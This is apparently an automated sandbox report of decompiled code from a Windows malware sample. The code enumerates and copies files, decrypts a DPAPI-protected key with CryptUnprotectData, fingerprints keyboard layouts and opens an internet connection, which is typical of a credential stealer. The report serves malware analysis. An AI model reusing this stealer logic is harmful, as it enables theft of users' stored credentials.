										E0041018C(E00410208(_t241, _t331,  &_v260, __eflags), _t331,  &_v16);
										_t244 = _v260;
									} else {
										E0041018C(E00410208(_t241, _t331,  &_v188, __eflags), _t331,  &_v16);
										E00401859(_v188);
										E0041018C(E004101C6(E00410208( &_v16, _t331,  &_v236, __eflags, 0x411be4), _t331,  &_a28,  &_v212, __eflags), _t331,  &_v16);
										E00401859(_v212);
										_t244 = _v236;
									}
									E00401859(_t244);
									E004100ED( &_v28, __eflags, _t327);
									_t247 = E0040EEA9(_t327,  &_v332, __eflags, 0x1a);
									_pop(_t332);
									E0041018C(E004101C6(E00410208( &_v28, _t332,  &_v308, __eflags,  *0x6153e4), _t332, _t247,  &_v284, __eflags), _t332,  &_v28);
									E00401859(_v284);
									E00401859(_v308);
									E00401859(_v332);
									CopyFileA(_v44, _v28, 1);
									_t405 = _t403 - 0xc;
									E0041011F( &_v28, _t332, _t405, __eflags);
									_t261 = E00405394( &_v32,  &_v76);
									_t406 = _t405 + 0xc;
									__eflags = _t261;
									if(__eflags != 0) {
										_push(_v76);
										_push(_v32);
										_t407 = _t406 - 0xc;
										E0041011F( &_v16, _t332, _t407, __eflags);
										_t408 = _t407 - 0x50;
										E004016EB( &_a44, _t408);
										_push( &_v356);
										E00403F95(_t332, __eflags);
										_t406 = _t408 + 0x68;
										E00401859(_v356);
									}
									DeleteFileA(_v28);
									E00401859(_v28);
									_v28 = 0;
									_v20 = 0;
									E00401859(_v16);
									_v16 = 0;
									_v8 = 0;
									_v92 =  &_v32;
									memset(_v92, 0, 4 << 0);
									_t403 = _t406 + 0xc;
									_t331 = 0;
									E00401859(0);
									__eflags = 0;
									E00401859(0);
									_t327 = 0x411be1;
								}
								E00401859(_v44);
							}
						}
						_t180 = FindNextFileA(_v60,  &_v692);
						__eflags = _t180;
					} while (_t180 != 0);
					FindClose(_v60);
					E00401859(_v56);
					E00401859(_v72);
					E00401859(0);
					_t188 = 0;
					__eflags = 0;
					goto L20;
				} else {
					E00401859(_v72);
					_t188 = _v56;
					L20:
					E00401859(_t188);
					E00401859(_a4);
					E00401859(_a16);
					E00401859(_a28);
					return E004016CC( &_a44);
				}
			}

0x0040117a
0x00401186
0x0040118f
0x00401198
0x004011a2
0x004011a9
0x004011b0
0x004011b5
0x004011b8
0x004011c0
0x004011c8
0x004011cd
0x004011d1
0x004011d3
0x00401265
0x0040126d
0x00401275
0x0040127d
0x00401285
0x0040128a
0x004011d5
0x00401208
0x00401210
0x00401218
0x00401220
0x00401225
0x00401225
0x0040128d
0x0040129c
0x004012a2
0x004012a8
0x004012ba
0x004012c6
0x004012cc
0x004012ce
0x004012e6
0x004012e8
0x004012f2
0x004012f7
0x004012fe
0x004013fa
0x00401402
0x0040140d
0x00401418
0x00401423
0x00401428
0x00401304
0x0040130a
0x00401366
0x0040136e
0x00401376
0x00401381
0x0040138c
0x00401397
0x004013a2
0x004013a7
0x004013a7
0x0040142e
0x00401433
0x0040143b
0x00401440
0x00401445
0x00401448
0x0040144a
0x00401454
0x00401490
0x00401495
0x00401498
0x004014a3
0x004014ab
0x004014b6
0x004014c1
0x004014c6
0x004014d0
0x004014d1
0x004014d3
0x0040153d
0x00401542
0x004014d5
0x004014e3
0x004014ee
0x00401517
0x00401522
0x00401527
0x00401527
0x00401548
0x00401551
0x0040155e
0x00401563
0x00401588
0x00401593
0x0040159e
0x004015a9
0x004015b6
0x004015bc
0x004015c3
0x004015ce
0x004015d3
0x004015d6
0x004015d8
0x004015da
0x004015e0
0x004015e3
0x004015e8
0x004015ed
0x004015f5
0x00401600
0x00401601
0x0040160c
0x0040160f
0x0040160f
0x00401617
0x00401620
0x0040162a
0x0040162d
0x00401630
0x00401638
0x0040163b
0x0040163e
0x0040164b
0x0040164b
0x0040164b
0x0040164f
0x00401654
0x00401656
0x0040165b
0x0040165b
0x00401663
0x00401663
0x004012e8
0x00401672
0x00401678
0x00401678
0x00401683
0x0040168c
0x00401694
0x0040169b
0x004016a0
0x004016a0
0x00000000
0x004012aa
0x004012ad
0x004012b2
0x004016a2
0x004016a2
0x004016aa
0x004016b2
0x004016ba
0x004016cb
0x004016cb

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 0040EFE3: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00411BE1,?), ref: 0040F014

Part of subcall function 004101C6: lstrcpy.KERNEL32(00000000,?), ref: 004101F4
Part of subcall function 004101C6: lstrcat.KERNEL32(?,00000000), ref: 004101FE

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

FindFirstFileA.KERNEL32(?,?,00411BE4,00411BE4,00411BE1,00411BE1,?,?,?), ref: 0040129C

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

StrCmpCA.SHLWAPI(?,00411BF0,?,?), ref: 004012C6
StrCmpCA.SHLWAPI(?,00411BF4,?,?), ref: 004012E0
CopyFileA.KERNEL32(?,?,00000001), ref: 004015B6

Part of subcall function 0041011F: lstrcpy.KERNEL32(00000000,?), ref: 0041013E

Part of subcall function 00405394: CreateFileA.KERNEL32(cd@,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,00406463,?,?,?,?), ref: 004053AF
Part of subcall function 00405394: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00406463,?,?,?,?), ref: 004053C6
Part of subcall function 00405394: LocalAlloc.KERNEL32(00000040,?,?,?,?,00406463,?,?,?,?), ref: 004053DD
Part of subcall function 00405394: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,00406463,?,?,?,?), ref: 004053F4
Part of subcall function 00405394: FindCloseChangeNotification.KERNEL32(?,?,?,?,00406463,?,?,?,?), ref: 0040541C

DeleteFileA.KERNEL32(?), ref: 00401617

Part of subcall function 00403F95: lstrlen.KERNEL32(?), ref: 00403FEE
Part of subcall function 00403F95: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040403D
Part of subcall function 00403F95: StrCmpCA.SHLWAPI(?), ref: 00404052

FindNextFileA.KERNEL32(?,?,?,?), ref: 00401672
FindClose.KERNEL32(?,?,?), ref: 00401683

Strings

\*.*, xrefs: 004011D5

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: File$lstrcpy$Find$Closelstrcatlstrlen$AllocChangeCopyCreateDeleteFirstFolderInternetLocalNextNotificationOpenPathReadSize
String ID: \*.*
API String ID: 2190286044-1173974218
Opcode ID: 3b249cbec71277de80de0ddba5c4713c28a5e4c85515e5193280ed3ca4c06eab
Instruction ID: 5a98d802c3393953950572c6c75b25085d3a4baa1d07a678852693932f06e302
Opcode Fuzzy Hash: 3b249cbec71277de80de0ddba5c4713c28a5e4c85515e5193280ed3ca4c06eab
Instruction Fuzzy Hash: 41E1D732D00119DBCF10FBA6DC42ACDB779AF04308F5145ABF519B7161DB78AE868B88

Uniqueness

Uniqueness Score: -1.00%

Function 0040551E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040551E(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a96) {
				char _v8;
				int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _v28;
				long _v32;
				intOrPtr _v36;
				char _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t39;
				char* _t45;
				char* _t46;
				void* _t48;
				intOrPtr _t53;
				long _t57;
				void* _t58;
				char* _t70;
				void* _t72;
				char* _t73;
				void* _t81;
				void* _t82;
				void* _t85;

				_v20 = _v20 & 0x00000000;
				E004100ED(_t85 - 0xc, __eflags, _a4);
				_t39 = E00405394( &_v12,  &_v16); // executed
				if(_t39 == 0 || _v12 == 0) {
					L17:
					E004016CC( &_a16);
					E00401859(_a96);
					return _v20;
				} else {
					_t81 = _v16;
					if(_t81 == 0) {
						goto L17;
					}
					_t45 = LocalAlloc(0x40, _t81 + 1); // executed
					_t73 = _t45;
					if(_t73 == 0) {
						goto L17;
					}
					if(_t81 == 0) {
						L7:
						_t46 = StrStrA(_t73,  *0x61504c);
						if(_t46 != 0) {
							_t11 =  &(_t46[0x10]); // 0x10
							_t48 = E00405430( &_v16, _t11,  &_v8, E0040EF51(_t11));
							if(_t48 != 0 && _v8 >= 5) {
								_t82 = _v16;
								__imp__memcmp(_t82, "DPAPI", 5);
								if(_t48 == 0) {
									_v40 = _v8 + 0xfffffffb;
									_v36 = _t82 + 5;
									_t53 =  *0x61568c( &_v40, 0, 0, 0, 0, 0,  &_v32); // executed
									_v24 = _t53;
									if(_t53 != 0) {
										_t57 = _v32;
										_v12 = _t57;
										_t58 = LocalAlloc(0x40, _t57);
										_v16 = _t58;
										if(_t58 != 0) {
											memcpy(_v16, _v28, _v12);
										}
									}
									LocalFree(_v28);
									if(_v24 != 0 && _v12 == 0x20) {
										_v20 = 1;
										E004054B4(_a12, _a8, _v16); // executed
									}
								}
							}
						}
						goto L17;
					} else {
						_t70 = _t73;
						_t72 = _v12 - _t73;
						do {
							 *_t70 =  *((intOrPtr*)(_t72 + _t70));
							_t70 =  &(_t70[1]);
							_t81 = _t81 - 1;
						} while (_t81 != 0);
						goto L7;
					}
				}
			}

0x00405524
0x00405533
0x0040553e
0x00405548
0x00405657
0x0040565a
0x00405662
0x0040566e
0x00405558
0x00405558
0x0040555d
0x00000000
0x00000000
0x00405569
0x0040556f
0x00405573
0x00000000
0x00000000
0x0040557b
0x0040558d
0x00405594
0x0040559c
0x004055a2
0x004055b1
0x004055b9
0x004055c9
0x004055d4
0x004055df
0x004055e7
0x004055fc
0x004055ff
0x00405605
0x0040560a
0x0040560c
0x00405612
0x00405615
0x0040561b
0x00405620
0x0040562b
0x0040562b
0x00405620
0x00405630
0x00405639
0x0040564a
0x00405651
0x00405656
0x00405639
0x004055df
0x004055b9
0x00000000
0x0040557d
0x00405580
0x00405582
0x00405584
0x00405587
0x00405589
0x0040558a
0x0040558a
0x00000000
0x00405584
0x0040557b

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 00405394: CreateFileA.KERNEL32(cd@,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,00406463,?,?,?,?), ref: 004053AF
Part of subcall function 00405394: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00406463,?,?,?,?), ref: 004053C6
Part of subcall function 00405394: LocalAlloc.KERNEL32(00000040,?,?,?,?,00406463,?,?,?,?), ref: 004053DD
Part of subcall function 00405394: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,00406463,?,?,?,?), ref: 004053F4
Part of subcall function 00405394: FindCloseChangeNotification.KERNEL32(?,?,?,?,00406463,?,?,?,?), ref: 0040541C

LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?), ref: 00405569
StrStrA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 00405594
memcmp.MSVCRT ref: 004055D4
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004055FF
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?), ref: 00405615
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00405630

Strings

DPAPI, xrefs: 004055CE
, xrefs: 0040563B

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Local$AllocFile$ChangeCloseCreateCryptDataFindFreeNotificationReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 939084651-1819349886
Opcode ID: 1926ead831227a19c0b73b17adec56bd468c352c36082a691be0820210d2a73e
Instruction ID: 773519b46ab489d2f227047b458c0c1306467d77429960186829e22cb3b29b9c
Opcode Fuzzy Hash: 1926ead831227a19c0b73b17adec56bd468c352c36082a691be0820210d2a73e
Instruction Fuzzy Hash: D2417972D00A09AFCF10EFA4C885AEFBB75EF44344F04446AE915B7290D73A9A44CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E91A Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80
memoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040E91A(void* __eflags, char _a4) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v28;
				char _v40;
				char _v52;
				char _v564;
				void* __esi;
				int _t30;
				int _t33;
				char _t41;
				intOrPtr _t44;
				void* _t46;
				void* _t55;
				void* _t56;
				void* _t64;

				_t1 =  &_a4; // 0x414044
				E004100ED( *_t1, __eflags, 0x411be1);
				_v12 = 0;
				_t30 = GetKeyboardLayoutList(0, 0);
				_t56 = LocalAlloc(0x40, _t30 << 2);
				_t33 = GetKeyboardLayoutList(_t30, _t56);
				_v16 = _t33;
				_v8 = 0;
				if(_t33 > 0) {
					do {
						GetLocaleInfoA( *(_t56 + _v8 * 4) & 0x0000ffff, 2,  &_v564, 0x200); // executed
						_t67 = _v12;
						_push( &_v564);
						_t41 = _a4;
						if(_v12 == 0) {
							E0041018C(E00410208(_t41, _t55,  &_v40, __eflags), _t55, _a4);
							_t44 = _v40;
						} else {
							E0041018C(E00410208(E00410208(_t41, _t55,  &_v52, _t67, " / "), _t55,  &_v28, _t67), _t55, _a4);
							E00401859(_v28);
							_t44 = _v52;
						}
						E00401859(_t44);
						_v12 = _v12 + 1;
						_t46 = 0;
						do {
							 *((char*)(_t64 + _t46 - 0x230)) = 0;
							if (_t46 != 0) goto L7;
							_t46 = _t46 + 1;
						} while (_t46 < 0x200);
						_v8 = _v8 + 1;
					} while (_v8 < _v16);
				}
				if(_t56 != 0) {
					LocalFree(_t56);
				}
				_t28 =  &_a4; // 0x414044
				return  *_t28;
			}

0x0040e925
0x0040e92e
0x0040e937
0x0040e93a
0x0040e94e
0x0040e952
0x0040e958
0x0040e95b
0x0040e960
0x0040e96b
0x0040e97d
0x0040e983
0x0040e98d
0x0040e98e
0x0040e991
0x0040e9c8
0x0040e9cd
0x0040e993
0x0040e9ab
0x0040e9b3
0x0040e9b8
0x0040e9b8
0x0040e9d0
0x0040e9d5
0x0040e9d8
0x0040e9da
0x0040e9da
0x0040e9e4
0x0040e9e6
0x0040e9e7
0x0040e9eb
0x0040e9f1
0x0040e96b
0x0040e9fc
0x0040e9ff
0x0040e9ff
0x0040ea05
0x0040ea0c

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

GetKeyboardLayoutList.USER32(00000000,00000000,00411BE1,00000104,?,00414044), ref: 0040E93A
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040E948
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0040E952
GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 0040E97D

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

LocalFree.KERNEL32(00000000), ref: 0040E9FF

Strings

D@A, xrefs: 0040E925, 0040EA05
/ , xrefs: 0040E993

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: / $D@A
API String ID: 507856799-3431685491
Opcode ID: 952d7431db25c8dfddded9317dcaf2661bd75dfde37306cbab09365e529dc684
Instruction ID: e752a6df00e19b58210807e84597e44d9ae13c9dbc7fb4eba8970d0b4d75cb4f
Opcode Fuzzy Hash: 952d7431db25c8dfddded9317dcaf2661bd75dfde37306cbab09365e529dc684
Instruction Fuzzy Hash: 71214F71900118EBCB50EBA6DD8AADE77B9EB44304F104466F905F7281D778AE818BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004086F1 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 414
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004086F1(void* __ecx, void* __eflags, char _a4, char _a16, char _a28, char _a40, int _a52, intOrPtr _a56, intOrPtr _a60, char _a64) {
				intOrPtr _v12;
				char _v20;
				intOrPtr _v24;
				char _v32;
				intOrPtr _v36;
				char _v44;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v60;
				char _v68;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v84;
				char _v92;
				void* _v96;
				CHAR* _v108;
				char _v120;
				char _v132;
				char _v144;
				char _v156;
				char _v168;
				char _v180;
				char _v192;
				char _v204;
				char _v216;
				char _v228;
				char _v240;
				char _v252;
				char _v264;
				char _v276;
				char _v288;
				char _v300;
				char _v312;
				char _v324;
				char _v336;
				char _v348;
				char _v360;
				char _v372;
				char _v384;
				char _v396;
				char _v408;
				char _v420;
				char _v432;
				char _v444;
				char _v456;
				struct _WIN32_FIND_DATAA _v776;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t164;
				int _t166;
				int _t168;
				int _t324;
				int _t337;
				int _t350;
				void* _t361;
				void* _t366;
				int _t377;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t447;
				void* _t448;
				void* _t449;
				void* _t450;
				void* _t451;
				void* _t452;
				void* _t453;
				void* _t454;
				void* _t455;
				void* _t456;
				void* _t457;
				void* _t458;
				void* _t459;
				void* _t460;
				void* _t461;
				void* _t462;
				void* _t464;

				_t463 = __eflags;
				_t366 = __ecx;
				_t361 = 0x411be1;
				E004100ED( &_v108, __eflags, 0x411be1);
				E0041018C(E00410208(E004101C6( &_v108, _t366,  &_a28,  &_v80, __eflags), _t366,  &_v68, _t463, "\*.*"), _t366,  &_v108);
				E00401859(_v68);
				E00401859(_v80);
				_t164 = FindFirstFileA(_v108,  &_v776); // executed
				_v96 = _t164;
				_t464 = _t164 - 0xffffffff;
				while(_t464 != 0) {
					_t166 =  *0x615784( &(_v776.cFileName), 0x411bf0);
					__eflags = _t166;
					if(_t166 != 0) {
						__eflags =  *0x615784( &(_v776.cFileName), 0x411bf4);
						if(__eflags != 0) {
							E00410148(_t366,  &_v20);
							E0041018C(E004101C6(E00410208(E00410208(E00410208(E004101C6(E00410208(E004101C6( &_v56, _t366,  &_a28,  &_v336, __eflags), _t366,  &_v192, __eflags, 0x411be4), _t366,  &_v20,  &_v432, __eflags), _t366,  &_v168, __eflags, 0x411be4), _t366,  &_v312, __eflags,  *0x61541c), _t366,  &_v144, __eflags, 0x411be4), _t366,  &_a4,  &_v360, __eflags), _t366,  &_v56);
							E00401859(_v360);
							E00401859(_v144);
							E00401859(_v312);
							E00401859(_v168);
							E00401859(_v432);
							E00401859(_v192);
							E00401859(_v336);
							E0041018C(E00410208(E00410208( &_v56, _t366,  &_v408, __eflags, 0x411be4), _t366,  &_v216, __eflags,  *0x615514), _t366,  &_v92);
							E00401859(_v216);
							E00401859(_v408);
							E0041018C(E004101C6(E00410208(E00410208(E00410208(E004101C6(E00410208(E004101C6( &_v44, _t366,  &_a28,  &_v132, __eflags), _t366,  &_v384, __eflags, 0x411be4), _t366,  &_v20,  &_v288, __eflags), _t366,  &_v456, __eflags, 0x411be4), _t366,  &_v264, __eflags,  *0x615324), _t366,  &_v120, __eflags, 0x411be4), _t366,  &_a4,  &_v240, __eflags), _t366,  &_v44);
							E00401859(_v240);
							E00401859(_v120);
							E00401859(_v264);
							E00401859(_v456);
							E00401859(_v288);
							E00401859(_v384);
							E00401859(_v132);
							E0041018C(E00410208(E00410208( &_v44, _t366,  &_v180, __eflags, 0x411be4), _t366,  &_v156, __eflags,  *0x615514), _t366,  &_v80);
							E00401859(_v156);
							E00401859(_v180);
							E0041018C(E00410208(E004101C6(E00410208(E00410208(E00410208(E00410208(E004101C6(E00410208(E004101C6( &_v32, _t366,  &_a28,  &_v396, __eflags), _t366,  &_v372, __eflags, 0x411be4), _t366,  &_v20,  &_v348, __eflags), _t366,  &_v324, __eflags, 0x411be4), _t366,  &_v300, __eflags,  *0x615100), _t366,  &_v276, __eflags, 0x411be4), _t366,  &_v252, __eflags,  *0x615014), _t366,  &_a4,  &_v228, __eflags), _t366,  &_v204, __eflags,  *0x61500c), _t366,  &_v32);
							E00401859(_v204);
							E00401859(_v228);
							E00401859(_v252);
							E00401859(_v276);
							E00401859(_v300);
							E00401859(_v324);
							E00401859(_v348);
							E00401859(_v372);
							E00401859(_v396);
							E0041018C(E00410208(E00410208( &_v32, _t366,  &_v444, __eflags, 0x411be4), _t366,  &_v420, __eflags,  *0x615514), _t366,  &_v68);
							E00401859(_v420);
							E00401859(_v444);
							_t377 = 0;
							__eflags = _a52;
							if(__eflags != 0) {
								_t447 = _t444 - 0xc;
								E0041011F( &_v92, _t366, _t447, __eflags); // executed
								_t350 = E0040EFB9(); // executed
								_t444 = _t447 + 0xc;
								__eflags = _t350;
								if(__eflags != 0) {
									_t448 = _t444 - 0x50;
									E004016EB( &_a64, _t448);
									_push(0);
									_t449 = _t448 - 0xc;
									E0041011F( &_v20, _t366, _t449, __eflags);
									_t450 = _t449 - 0xc;
									E0041011F( &_a40, _t366, _t450, __eflags);
									_t451 = _t450 - 0xc;
									E0041011F( &_a16, _t366, _t451, __eflags);
									_t452 = _t451 - 0xc;
									E0041011F( &_v56, _t366, _t452, __eflags);
									E0040827F(_t366, __eflags);
									_t444 = _t452 + 0x84;
									_t377 = 0;
									__eflags = 0;
								}
							}
							__eflags = _a56 - _t377;
							if(__eflags != 0) {
								_t446 = _t444 - 0xc;
								E0041011F( &_v80, _t366, _t446, __eflags); // executed
								_t337 = E0040EFB9(); // executed
								_t444 = _t446 + 0xc;
								__eflags = _t337;
								if(__eflags != 0) {
									_t453 = _t444 - 0x50;
									E004016EB( &_a64, _t453);
									_push(1);
									_t454 = _t453 - 0xc;
									E0041011F( &_v20, _t366, _t454, __eflags);
									_t455 = _t454 - 0xc;
									E0041011F( &_a40, _t366, _t455, __eflags);
									_t456 = _t455 - 0xc;
									E0041011F( &_a16, _t366, _t456, __eflags);
									_t457 = _t456 - 0xc;
									E0041011F( &_v44, _t366, _t457, __eflags);
									E0040827F(_t366, __eflags);
									_t444 = _t457 + 0x84;
									_t377 = 0;
									__eflags = 0;
								}
							}
							__eflags = _a60 - _t377;
							if(__eflags != 0) {
								_t445 = _t444 - 0xc;
								E0041011F( &_v68, _t366, _t445, __eflags); // executed
								_t324 = E0040EFB9(); // executed
								_t444 = _t445 + 0xc;
								__eflags = _t324;
								if(__eflags != 0) {
									_t458 = _t444 - 0x50;
									E004016EB( &_a64, _t458);
									_push(2);
									_t459 = _t458 - 0xc;
									E0041011F( &_v20, _t366, _t459, __eflags);
									_t460 = _t459 - 0xc;
									E0041011F( &_a40, _t366, _t460, __eflags);
									_t461 = _t460 - 0xc;
									E0041011F( &_a16, _t366, _t461, __eflags);
									_t462 = _t461 - 0xc;
									E0041011F( &_v32, _t366, _t462, __eflags);
									E0040827F(_t366, __eflags);
									_t444 = _t462 + 0x84;
									_t377 = 0;
									__eflags = 0;
								}
							}
							E00401859(_v20);
							_v20 = _t377;
							_v12 = _t377;
							E00401859(_v56);
							_v56 = _t377;
							_v48 = _t377;
							E00401859(_v92);
							_v92 = _t377;
							_v84 = _t377;
							E00401859(_v44);
							_v44 = _t377;
							_v36 = _t377;
							E00401859(_v80);
							_v80 = _t377;
							_v72 = _t377;
							E00401859(_v32);
							_v32 = _t377;
							_v24 = _t377;
							E00401859(_v68);
							_v68 = _t377;
							_v60 = _t377;
							E00401859(0);
							E00401859(0);
							E00401859(0);
							E00401859(0);
							E00401859(0);
							E00401859(0);
							__eflags = 0;
							E00401859(0);
							_t361 = 0x411be1;
						}
					}
					_t168 = FindNextFileA(_v96,  &_v776); // executed
					__eflags = _t168;
				}
				E00401859(_v108);
				E00401859(_a4);
				E00401859(_a16);
				E00401859(_a28);
				E00401859(_a40);
				return E004016CC( &_a64);
			}

0x004086f1
0x004086f1
0x004086fd
0x00408706
0x00408729
0x00408731
0x00408739
0x00408748
0x0040874e
0x00408751
0x00408d15
0x00408765
0x0040876b
0x0040876d
0x00408785
0x00408787
0x0040880a
0x00408879
0x00408884
0x0040888f
0x0040889a
0x004088a5
0x004088b0
0x004088bb
0x004088c6
0x004088ee
0x004088f9
0x00408904
0x00408968
0x00408973
0x0040897b
0x00408986
0x00408991
0x0040899c
0x004089a7
0x004089af
0x004089d7
0x004089e2
0x004089ed
0x00408a79
0x00408a84
0x00408a8f
0x00408a9a
0x00408aa5
0x00408ab0
0x00408abb
0x00408ac6
0x00408ad1
0x00408adc
0x00408b04
0x00408b0f
0x00408b1a
0x00408b1f
0x00408b21
0x00408b24
0x00408b26
0x00408b2e
0x00408b33
0x00408b38
0x00408b3b
0x00408b3d
0x00408b3f
0x00408b47
0x00408b4c
0x00408b4e
0x00408b56
0x00408b5b
0x00408b63
0x00408b68
0x00408b70
0x00408b75
0x00408b7d
0x00408b82
0x00408b87
0x00408b8d
0x00408b8d
0x00408b8d
0x00408b3d
0x00408b8f
0x00408b92
0x00408b94
0x00408b9c
0x00408ba1
0x00408ba6
0x00408ba9
0x00408bab
0x00408bad
0x00408bb5
0x00408bba
0x00408bbc
0x00408bc4
0x00408bc9
0x00408bd1
0x00408bd6
0x00408bde
0x00408be3
0x00408beb
0x00408bf0
0x00408bf5
0x00408bfb
0x00408bfb
0x00408bfb
0x00408bab
0x00408bfd
0x00408c00
0x00408c02
0x00408c0a
0x00408c0f
0x00408c14
0x00408c17
0x00408c19
0x00408c1b
0x00408c23
0x00408c28
0x00408c2a
0x00408c32
0x00408c37
0x00408c3f
0x00408c44
0x00408c4c
0x00408c51
0x00408c59
0x00408c5e
0x00408c63
0x00408c69
0x00408c69
0x00408c69
0x00408c19
0x00408c6e
0x00408c76
0x00408c79
0x00408c7c
0x00408c84
0x00408c87
0x00408c8a
0x00408c92
0x00408c95
0x00408c98
0x00408ca0
0x00408ca3
0x00408ca6
0x00408cae
0x00408cb1
0x00408cb4
0x00408cbc
0x00408cbf
0x00408cc2
0x00408cc9
0x00408ccc
0x00408ccf
0x00408cd6
0x00408cdd
0x00408ce4
0x00408ceb
0x00408cf2
0x00408cf7
0x00408cf9
0x00408cfe
0x00408cfe
0x00408787
0x00408d0d
0x00408d13
0x00408d13
0x00408d1e
0x00408d26
0x00408d2e
0x00408d36
0x00408d3e
0x00408d4f

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 004101C6: lstrcpy.KERNEL32(00000000,?), ref: 004101F4
Part of subcall function 004101C6: lstrcat.KERNEL32(?,00000000), ref: 004101FE

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

